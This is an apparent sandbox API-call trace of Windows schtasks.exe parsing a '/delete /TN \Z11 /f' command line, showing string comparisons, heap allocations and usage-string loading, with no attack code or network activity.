[0380.379] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.379] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|change|") returned 8
[0380.379] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|TN|") returned 4
[0380.379] lstrlenW (lpString="|change|") returned 8
[0380.379] lstrlenW (lpString="|TN|") returned 4
[0380.379] StrStrIW (lpFirst="|change|", lpSrch="|TN|") returned 0x0
[0380.379] SetLastError (dwErrCode=0x490)
[0380.379] lstrlenW (lpString="run") returned 3
[0380.379] lstrlenW (lpString="run") returned 3
[0380.379] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.379] lstrlenW (lpString="TN") returned 2
[0380.379] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.380] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|run|") returned 5
[0380.380] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|TN|") returned 4
[0380.380] lstrlenW (lpString="|run|") returned 5
[0380.380] lstrlenW (lpString="|TN|") returned 4
[0380.380] StrStrIW (lpFirst="|run|", lpSrch="|TN|") returned 0x0
[0380.380] SetLastError (dwErrCode=0x490)
[0380.380] lstrlenW (lpString="end") returned 3
[0380.380] lstrlenW (lpString="end") returned 3
[0380.380] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.380] lstrlenW (lpString="TN") returned 2
[0380.380] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.381] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|end|") returned 5
[0380.381] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|TN|") returned 4
[0380.381] lstrlenW (lpString="|end|") returned 5
[0380.381] lstrlenW (lpString="|TN|") returned 4
[0380.381] StrStrIW (lpFirst="|end|", lpSrch="|TN|") returned 0x0
[0380.381] SetLastError (dwErrCode=0x490)
[0380.381] lstrlenW (lpString="showsid") returned 7
[0380.381] lstrlenW (lpString="showsid") returned 7
[0380.381] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.381] GetProcessHeap () returned 0x80000
[0380.381] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c2d0) returned 1
[0380.381] GetProcessHeap () returned 0x80000
[0380.381] RtlReAllocateHeap (Heap=0x80000, Flags=0xc, Ptr=0x9c2d0, Size=0x16) returned 0x9c2d0
[0380.382] lstrlenW (lpString="TN") returned 2
[0380.382] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.382] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0xa, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|showsid|") returned 9
[0380.382] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|TN|") returned 4
[0380.382] lstrlenW (lpString="|showsid|") returned 9
[0380.382] lstrlenW (lpString="|TN|") returned 4
[0380.382] StrStrIW (lpFirst="|showsid|", lpSrch="|TN|") returned 0x0
[0380.382] SetLastError (dwErrCode=0x490)
[0380.382] SetLastError (dwErrCode=0x490)
[0380.382] SetLastError (dwErrCode=0x0)
[0380.382] lstrlenW (lpString="/TN") returned 3
[0380.382] StrChrIW (lpStart="/TN", wMatch=0x3a) returned 0x0
[0380.383] SetLastError (dwErrCode=0x490)
[0380.383] SetLastError (dwErrCode=0x0)
[0380.383] lstrlenW (lpString="/TN") returned 3
[0380.383] GetProcessHeap () returned 0x80000
[0380.383] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x8) returned 0x9c270
[0380.383] GetProcessHeap () returned 0x80000
[0380.383] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9ccd0
[0380.383] SetLastError (dwErrCode=0x0)
[0380.383] SetLastError (dwErrCode=0x0)
[0380.383] lstrlenW (lpString="\\Z11") returned 4
[0380.383] lstrlenW (lpString="-/") returned 2
[0380.383] StrChrIW (lpStart="-/", wMatch=0x5c) returned 0x0
[0380.383] SetLastError (dwErrCode=0x490)
[0380.383] SetLastError (dwErrCode=0x490)
[0380.383] SetLastError (dwErrCode=0x0)
[0380.384] lstrlenW (lpString="\\Z11") returned 4
[0380.384] StrChrIW (lpStart="\\Z11", wMatch=0x3a) returned 0x0
[0380.384] SetLastError (dwErrCode=0x490)
[0380.384] SetLastError (dwErrCode=0x0)
[0380.384] lstrlenW (lpString="\\Z11") returned 4
[0380.384] GetProcessHeap () returned 0x80000
[0380.384] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0xa) returned 0x9c300
[0380.385] GetProcessHeap () returned 0x80000
[0380.385] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9cd00
[0380.385] SetLastError (dwErrCode=0x0)
[0380.385] SetLastError (dwErrCode=0x0)
[0380.386] lstrlenW (lpString="/f") returned 2
[0380.386] lstrlenW (lpString="-/") returned 2
[0380.386] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0380.386] lstrlenW (lpString="?") returned 1
[0380.386] lstrlenW (lpString="?") returned 1
[0380.386] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.386] lstrlenW (lpString="f") returned 1
[0380.386] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.386] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|?|") returned 3
[0380.386] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|f|") returned 3
[0380.386] lstrlenW (lpString="|?|") returned 3
[0380.386] lstrlenW (lpString="|f|") returned 3
[0380.387] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0
[0380.387] SetLastError (dwErrCode=0x490)
[0380.387] lstrlenW (lpString="create") returned 6
[0380.387] lstrlenW (lpString="create") returned 6
[0380.387] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.387] lstrlenW (lpString="f") returned 1
[0380.387] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.388] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|create|") returned 8
[0380.388] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|f|") returned 3
[0380.388] lstrlenW (lpString="|create|") returned 8
[0380.388] lstrlenW (lpString="|f|") returned 3
[0380.388] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0
[0380.388] SetLastError (dwErrCode=0x490)
[0380.388] lstrlenW (lpString="delete") returned 6
[0380.388] lstrlenW (lpString="delete") returned 6
[0380.388] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.388] lstrlenW (lpString="f") returned 1
[0380.388] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.389] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|delete|") returned 8
[0380.389] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|f|") returned 3
[0380.389] lstrlenW (lpString="|delete|") returned 8
[0380.389] lstrlenW (lpString="|f|") returned 3
[0380.389] StrStrIW (lpFirst="|delete|", lpSrch="|f|") returned 0x0
[0380.389] SetLastError (dwErrCode=0x490)
[0380.389] lstrlenW (lpString="query") returned 5
[0380.389] lstrlenW (lpString="query") returned 5
[0380.389] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.389] lstrlenW (lpString="f") returned 1
[0380.389] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.389] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x8, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|query|") returned 7
[0380.390] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|f|") returned 3
[0380.390] lstrlenW (lpString="|query|") returned 7
[0380.390] lstrlenW (lpString="|f|") returned 3
[0380.390] StrStrIW (lpFirst="|query|", lpSrch="|f|") returned 0x0
[0380.390] SetLastError (dwErrCode=0x490)
[0380.390] lstrlenW (lpString="change") returned 6
[0380.390] lstrlenW (lpString="change") returned 6
[0380.390] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.390] lstrlenW (lpString="f") returned 1
[0380.390] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.390] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|change|") returned 8
[0380.390] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|f|") returned 3
[0380.390] lstrlenW (lpString="|change|") returned 8
[0380.391] lstrlenW (lpString="|f|") returned 3
[0380.391] StrStrIW (lpFirst="|change|", lpSrch="|f|") returned 0x0
[0380.391] SetLastError (dwErrCode=0x490)
[0380.391] lstrlenW (lpString="run") returned 3
[0380.391] lstrlenW (lpString="run") returned 3
[0380.391] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.391] lstrlenW (lpString="f") returned 1
[0380.391] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.391] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|run|") returned 5
[0380.391] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|f|") returned 3
[0380.391] lstrlenW (lpString="|run|") returned 5
[0380.391] lstrlenW (lpString="|f|") returned 3
[0380.392] StrStrIW (lpFirst="|run|", lpSrch="|f|") returned 0x0
[0380.392] SetLastError (dwErrCode=0x490)
[0380.392] lstrlenW (lpString="end") returned 3
[0380.392] lstrlenW (lpString="end") returned 3
[0380.392] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.392] lstrlenW (lpString="f") returned 1
[0380.392] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.392] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|end|") returned 5
[0380.392] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|f|") returned 3
[0380.392] lstrlenW (lpString="|end|") returned 5
[0380.392] lstrlenW (lpString="|f|") returned 3
[0380.392] StrStrIW (lpFirst="|end|", lpSrch="|f|") returned 0x0
[0380.392] SetLastError (dwErrCode=0x490)
[0380.392] lstrlenW (lpString="showsid") returned 7
[0380.393] lstrlenW (lpString="showsid") returned 7
[0380.393] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.393] lstrlenW (lpString="f") returned 1
[0380.393] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.393] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0xa, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|showsid|") returned 9
[0380.393] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|f|") returned 3
[0380.393] lstrlenW (lpString="|showsid|") returned 9
[0380.393] lstrlenW (lpString="|f|") returned 3
[0380.393] StrStrIW (lpFirst="|showsid|", lpSrch="|f|") returned 0x0
[0380.393] SetLastError (dwErrCode=0x490)
[0380.393] SetLastError (dwErrCode=0x490)
[0380.393] SetLastError (dwErrCode=0x0)
[0380.394] lstrlenW (lpString="/f") returned 2
[0380.394] StrChrIW (lpStart="/f", wMatch=0x3a) returned 0x0
[0380.394] SetLastError (dwErrCode=0x490)
[0380.394] SetLastError (dwErrCode=0x0)
[0380.394] lstrlenW (lpString="/f") returned 2
[0380.394] GetProcessHeap () returned 0x80000
[0380.394] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x6) returned 0x9c320
[0380.394] GetProcessHeap () returned 0x80000
[0380.394] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9cd30
[0380.394] SetLastError (dwErrCode=0x0)
[0380.394] GetProcessHeap () returned 0x80000
[0380.394] GetProcessHeap () returned 0x80000
[0380.394] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c270) returned 1
[0380.394] GetProcessHeap () returned 0x80000
[0380.394] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9c270) returned 0x8
[0380.395] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9c270 | out: hHeap=0x80000) returned 1
[0380.395] GetProcessHeap () returned 0x80000
[0380.395] GetProcessHeap () returned 0x80000
[0380.395] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9ccd0) returned 1
[0380.395] GetProcessHeap () returned 0x80000
[0380.395] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9ccd0) returned 0x20
[0380.395] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9ccd0 | out: hHeap=0x80000) returned 1
[0380.395] GetProcessHeap () returned 0x80000
[0380.395] GetProcessHeap () returned 0x80000
[0380.396] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c300) returned 1
[0380.396] GetProcessHeap () returned 0x80000
[0380.396] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9c300) returned 0xa
[0380.396] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9c300 | out: hHeap=0x80000) returned 1
[0380.396] GetProcessHeap () returned 0x80000
[0380.396] GetProcessHeap () returned 0x80000
[0380.396] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9cd00) returned 1
[0380.396] GetProcessHeap () returned 0x80000
[0380.396] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9cd00) returned 0x20
[0380.396] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9cd00 | out: hHeap=0x80000) returned 1
[0380.396] GetProcessHeap () returned 0x80000
[0380.397] GetProcessHeap () returned 0x80000
[0380.397] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c320) returned 1
[0380.397] GetProcessHeap () returned 0x80000
[0380.397] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9c320) returned 0x6
[0380.397] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9c320 | out: hHeap=0x80000) returned 1
[0380.397] GetProcessHeap () returned 0x80000
[0380.397] GetProcessHeap () returned 0x80000
[0380.397] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9cd30) returned 1
[0380.397] GetProcessHeap () returned 0x80000
[0380.397] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9cd30) returned 0x20
[0380.397] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9cd30 | out: hHeap=0x80000) returned 1
[0380.397] GetProcessHeap () returned 0x80000
[0380.398] GetProcessHeap () returned 0x80000
[0380.398] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9ba40) returned 1
[0380.398] GetProcessHeap () returned 0x80000
[0380.398] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9ba40) returned 0x18
[0380.398] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9ba40 | out: hHeap=0x80000) returned 1
[0380.398] SetLastError (dwErrCode=0x0)
[0380.398] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x2, Condition=0x3) returned 0x8000000000000018
[0380.398] VerSetConditionMask (ConditionMask=0x8000000000000018, TypeMask=0x1, Condition=0x3) returned 0x800000000000001b
[0380.399] VerSetConditionMask (ConditionMask=0x800000000000001b, TypeMask=0x20, Condition=0x3) returned 0x800000000001801b
[0380.399] VerifyVersionInfoW (in: lpVersionInformation=0x24eef0, dwTypeMask=0x3, dwlConditionMask=0x800000000001801b | out: lpVersionInformation=0x24eef0) returned 1
[0380.399] SetLastError (dwErrCode=0x0)
[0380.399] lstrlenW (lpString="delete") returned 6
[0380.399] StrChrIW (lpStart="delete", wMatch=0x7c) returned 0x0
[0380.399] SetLastError (dwErrCode=0x490)
[0380.399] SetLastError (dwErrCode=0x0)
[0380.399] lstrlenW (lpString="delete") returned 6
[0380.399] GetProcessHeap () returned 0x80000
[0380.399] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9cd30
[0380.399] GetProcessHeap () returned 0x80000
[0380.399] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0x9ba40
[0380.399] _memicmp (_Buf1=0x9ba40, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.399] GetProcessHeap () returned 0x80000
[0380.399] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x16) returned 0x9c270
[0380.400] SetLastError (dwErrCode=0x0)
[0380.400] _memicmp (_Buf1=0x9bb00, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.400] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x9bca0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\schtasks.exe" (normalized: "c:\\windows\\system32\\schtasks.exe")) returned 0x20
[0380.400] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0380.400] GetProcessHeap () returned 0x80000
[0380.401] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x74e) returned 0x9d560
[0380.401] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x9d560 | out: lpData=0x9d560) returned 1
[0380.401] VerQueryValueW (in: pBlock=0x9d560, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24efd8, puLen=0x24f040 | out: lplpBuffer=0x24efd8*=0x9d8fc, puLen=0x24f040) returned 1
[0380.401] _memicmp (_Buf1=0x9bb00, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.401] _vsnwprintf (in: _Buffer=0x9bca0, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x24efb8 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0380.401] VerQueryValueW (in: pBlock=0x9d560, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x24f048, puLen=0x24f038 | out: lplpBuffer=0x24f048*=0x9d728, puLen=0x24f038) returned 1
[0380.401] lstrlenW (lpString="schtasks.exe") returned 12
[0380.401] lstrlenW (lpString="schtasks.exe") returned 12
[0380.401] lstrlenW (lpString=".EXE") returned 4
[0380.402] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0380.402] lstrlenW (lpString="schtasks.exe") returned 12
[0380.402] lstrlenW (lpString=".EXE") returned 4
[0380.402] lstrlenW (lpString="schtasks") returned 8
[0380.402] lstrlenW (lpString="/delete") returned 7
[0380.402] _memicmp (_Buf1=0x9bb00, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.430] _vsnwprintf (in: _Buffer=0x9bca0, _BufferCount=0x19, _Format="%s %s", _ArgList=0x24efb8 | out: _Buffer="schtasks /delete") returned 16
[0380.437] _memicmp (_Buf1=0x9bb20, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.437] GetProcessHeap () returned 0x80000
[0380.437] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9cd00
[0380.437] _memicmp (_Buf1=0x9bb40, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.437] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x9d350, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0380.438] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0380.438] GetProcessHeap () returned 0x80000
[0380.438] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x30) returned 0x97c90
[0380.438] _vsnwprintf (in: _Buffer=0x9c0a0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x24efb8 | out: _Buffer="Type \"SCHTASKS /DELETE /?\" for usage.") returned 37
[0380.438] GetProcessHeap () returned 0x80000
[0380.438] GetProcessHeap () returned 0x80000
[0380.438] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9d560) returned 1
[0380.438] GetProcessHeap () returned 0x80000
[0380.438] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9d560) returned 0x74e
[0380.438] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9d560 | out: hHeap=0x80000) returned 1
[0380.438] SetLastError (dwErrCode=0x0)
[0380.438] GetThreadLocale () returned 0x409
[0380.439] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.439] lstrlenW (lpString="delete") returned 6
[0380.439] GetThreadLocale () returned 0x409
[0380.439] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.439] lstrlenW (lpString="?") returned 1
[0380.439] GetThreadLocale () returned 0x409
[0380.439] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.439] lstrlenW (lpString="s") returned 1
[0380.439] GetThreadLocale () returned 0x409
[0380.439] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.439] lstrlenW (lpString="u") returned 1
[0380.439] GetThreadLocale () returned 0x409
[0380.439] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.439] lstrlenW (lpString="p") returned 1
[0380.439] GetThreadLocale () returned 0x409
[0380.439] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.440] lstrlenW (lpString="tn") returned 2
[0380.440] GetThreadLocale () returned 0x409
[0380.440] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.440] lstrlenW (lpString="f") returned 1
[0380.440] SetLastError (dwErrCode=0x0)
[0380.440] SetLastError (dwErrCode=0x0)
[0380.440] lstrlenW (lpString="/Delete") returned 7
[0380.440] lstrlenW (lpString="-/") returned 2
[0380.440] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0380.440] lstrlenW (lpString="delete") returned 6
[0380.440] lstrlenW (lpString="delete") returned 6
[0380.440] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.440] lstrlenW (lpString="Delete") returned 6
[0380.440] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.441] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|delete|") returned 8
[0380.441] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|Delete|") returned 8
[0380.441] lstrlenW (lpString="|delete|") returned 8
[0380.441] lstrlenW (lpString="|Delete|") returned 8
[0380.441] StrStrIW (lpFirst="|delete|", lpSrch="|Delete|") returned="|delete|"
[0380.441] SetLastError (dwErrCode=0x0)
[0380.441] SetLastError (dwErrCode=0x0)
[0380.441] SetLastError (dwErrCode=0x0)
[0380.441] lstrlenW (lpString="/TN") returned 3
[0380.441] lstrlenW (lpString="-/") returned 2
[0380.441] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0380.441] lstrlenW (lpString="delete") returned 6
[0380.441] lstrlenW (lpString="delete") returned 6
[0380.442] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.442] lstrlenW (lpString="TN") returned 2
[0380.442] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.442] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|delete|") returned 8
[0380.442] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|TN|") returned 4
[0380.442] lstrlenW (lpString="|delete|") returned 8
[0380.442] lstrlenW (lpString="|TN|") returned 4
[0380.442] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0
[0380.442] SetLastError (dwErrCode=0x490)
[0380.442] lstrlenW (lpString="?") returned 1
[0380.442] lstrlenW (lpString="?") returned 1
[0380.442] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.443] lstrlenW (lpString="TN") returned 2
[0380.443] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.443] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|?|") returned 3
[0380.443] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|TN|") returned 4
[0380.443] lstrlenW (lpString="|?|") returned 3
[0380.443] lstrlenW (lpString="|TN|") returned 4
[0380.443] SetLastError (dwErrCode=0x490)
[0380.443] lstrlenW (lpString="s") returned 1
[0380.443] lstrlenW (lpString="s") returned 1
[0380.443] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.443] lstrlenW (lpString="TN") returned 2
[0380.443] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.444] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|s|") returned 3
[0380.444] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|TN|") returned 4
[0380.444] lstrlenW (lpString="|s|") returned 3
[0380.444] lstrlenW (lpString="|TN|") returned 4
[0380.444] SetLastError (dwErrCode=0x490)
[0380.444] lstrlenW (lpString="u") returned 1
[0380.444] lstrlenW (lpString="u") returned 1
[0380.444] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.444] lstrlenW (lpString="TN") returned 2
[0380.444] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.444] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|u|") returned 3
[0380.444] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|TN|") returned 4
[0380.444] lstrlenW (lpString="|u|") returned 3
[0380.444] lstrlenW (lpString="|TN|") returned 4
[0380.445] SetLastError (dwErrCode=0x490)
[0380.445] lstrlenW (lpString="p") returned 1
[0380.445] lstrlenW (lpString="p") returned 1
[0380.445] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.445] lstrlenW (lpString="TN") returned 2
[0380.445] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.445] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|p|") returned 3
[0380.445] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|TN|") returned 4
[0380.445] lstrlenW (lpString="|p|") returned 3
[0380.445] lstrlenW (lpString="|TN|") returned 4
